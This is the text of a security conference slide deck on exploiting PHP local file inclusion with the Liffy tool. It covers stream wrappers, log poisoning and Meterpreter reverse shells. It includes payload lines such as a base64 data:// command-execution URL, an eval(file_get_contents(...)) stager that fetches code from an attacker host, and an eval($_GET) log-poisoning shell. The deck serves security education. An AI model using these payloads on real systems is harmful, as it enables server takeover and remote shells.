Upload
benjamin-watson
View
320
Download
5
Tags:
Embed Size (px)
DESCRIPTION
From Ashy To Classy | LFI Exploitation with Liffy
Citation preview
From Ashy To Classy
LFI Exploitation with Liffy
Agenda
File Inclusion Vulnerability History and OverviewLiffy IntroductionTechniquesConsiderationsFuture Development
2
#whoami
Application Security Practice Manager @VerSprite – We love product security!
I <3 Python and Java
Enterprise WebApp Background
CTF player and boot2rooter
Twitters: @rotlogix
Personal Blog: http://rotlogix.com
3
LFI History and Overview
What is it?
“The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.” – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Issues with include(), and require() > untrusted code evaluationExample
<?php include($_GET[‘file’]); ?> = http://target/find.php?file=/etc/passwd
<?php “files/”.include($_GET[‘file’].”.php”); ?> = Requires traversal “../../ “ and null byte %00
The problem is passing a URL parameter which is user controlled as the file argument for an include or require statement.
4
LFI History and Overview
GitHub LULZ
5
LFI History and Overview
File Inclusion Vulnerabilities have been around forever! 2002?
Around 340 “Inclusion” related entries on Exploit-DB over the last 5 years
Vulnerability dropped from OWASP Top 10 in 2010
My Opinion? Doesn’t matter.
Consider all the legacy PHP written applications, plugin development for things like Wordpress
6
Liffy Introduction
A tool that attempts to take a seemingly “read-only” LFI vulnerability into a full blown PHP Meterpreter web shell
Developed in Python
Currently has 10 features, which we will discuss
Using Python’s SimpleHTTPServer library to spawn as needed web serving for payload staging
Major enhancements added by Dan ‘unicornFurnace’ Crowley @SpiderLabs
7
Liffy Feature Overview
data:// - stream wrapper (code execution)php://input – stream wrapper (code execution)php://filter – stream wrapper (file reads)php://expect – process control extension (code execution)/proc/self/environ – CGI mode (code executionApache access log poisoning (code execution)Linux auth log poisoning (code execution)Support for absolute and relative paths (log poisoning)Support for cookiesDirect or staged payload delivery
8
Payload Generation
Leverages msfpayload
PHP Meterpreter Reverse TCP
Liffy allows you to set specify your own LHOST and LPORT for the Meterpreter
Creates corresponding resource file which loads a multi-handler
9
Direct & Staged Payloads
This simply means directly executing your payload, or using additional code to download and execute your payload through the chosen technique (data://, php://input, etc)
Staged DeliveryGenerate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php)Encode and use "<?php eval(file_get_contents(‘http://local:8000/{random}.php’))?>Spawn temporary web server to host shell out of /tmp directoryStager downloads and executes shell Listening handler catches reverse shell
Direct DeliveryGenerate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php)Read payload from stored file (/tmp/{random}.php)Encode and send directly through wrapper – data://text/html;base64,{payload}Listening handler catches reverse shell
10
Techniques: data://
RFC 2397 – data URL scheme
“ Allows the inclusion of small data items as “immediate” data, as if it had been included externally”
Stream wrapper supported since PHP 5.2.0Usage: data://text/html;base64,{encoded code here}Restricted by allow_url_include (enabled / disabled)Set in php.iniIf enabled you would potentially have an RFI as well
“ Allows the use of URL-aware file open wrappers with functions like include”
11
Techniques: data://
How do we use this?
http://target.com/lfi.php?file=data://text/html;base64, PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
<?php system(‘whoami’); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4=
12
Techniques: data://
How does Liffy use this?
Non-Staged: Generate payload with msfpayload and resource fileRead payload from generated fileEncode the payloadLoad listening handler for reverse connectionsDeliver it directly data://text/html;base64, {payload}
Staged:Generate payload with msfpayload and resource fileEncode <?php eval(file_get_contents(‘http://attacker/:8000/{shell}.php’))?>Load listening handler for reverse connectionsSpawn web server to host payloadExecute
13
Techniques: data:// > DEMO!
14
Techniques: php://input
Read-only stream wrapperUsed in POST requests, allows you to read the response dataRestricted by allow_url_include Example:
15
Techniques: php://input
How does Liffy implement this technique?
Exactly the same as data://
Staged and Non-Staged Approach
Really you should always chose Non-Staged in this scenario
POST (direct delivery) = Non-Staged
16
Techniques: php://input > DEMO!
17
Techniques: SSH auth.log Poisoning
Assumes you can include the SSH auth.log
If you can there is a usually a misconfiguration issue!
The process of injecting PHP code through a failed login attempts
Code now appears in the auth.log
Include auth.log for code execution!
18
Techniques: SSH auth.log Poisoning
Assumes you can include the SSH auth.log
If you can there is a usually a misconfiguration issue!
The process of injecting PHP code through a failed login attempts
Code now appears in the auth.log
Include auth.log for code execution!
19
Techniques: SSH auth.log Poisoning
Liffy implements by creating a payload through msfpayload
Reads the PHP payload and assigns to “payload_1”
Uses <?php eval($_GET[‘code’])?> as “payload_2”
The second payload is used to poison the auth.log
The first payload is what is called after the final inclusion “&code=“
Supports path traversal sequences if needed > “../, ..\\, /../ “
20
Techniques: SSH auth.log Poisoning > DEMO!
21
Techniques: Apache access.log Poisoning
Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log)
Poison logs through the User-Agent by injecting PHP code
Include the access.log and your PHP code get’s evaluated
22
Techniques: Apache access.log Poisoning
If the log location isn’t different (you should know this), Liffy defaults to the most common location
Supports path traversal as we already saw with the auth.log
Payload is creation is the same, but with only direct delivery
Encodes the payload in base64 and uses eval(base64_decode()); to get around double or single quotes causing parse errors
Again everything gets delivered through the User-Agent
23
Techniques: Apache access.log Poisoning > DEMO!
24
Techniques: php://filter
Wrapper that supports permitting the application of filters to a stream when you opened
Takes a resource argument, which is what you want to read
Used in conjunction with base64 encoding “Conversion Filter”
Takes the resource > streams and reads the data > converts to base64 > output is an base64 encoded string
Example:
http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php
25
Techniques: php://filter
Liffy automates this for you!
Prompts you for a file that you want to read
Decodes the encoded string and echo's the contents back to the terminal
Useful for viewing PHP source from files you have access to
26
Techniques: php://filter > DEMO!
27
Future Work
Make the internal web server smarter and more reliable
Better Object Oriented design
Re-write the command-line interface
Dynamic request object building and re-use for everything HTTP
Support bypassing filters for path traversals
Write custom PHP reverse shell with built-in handler
28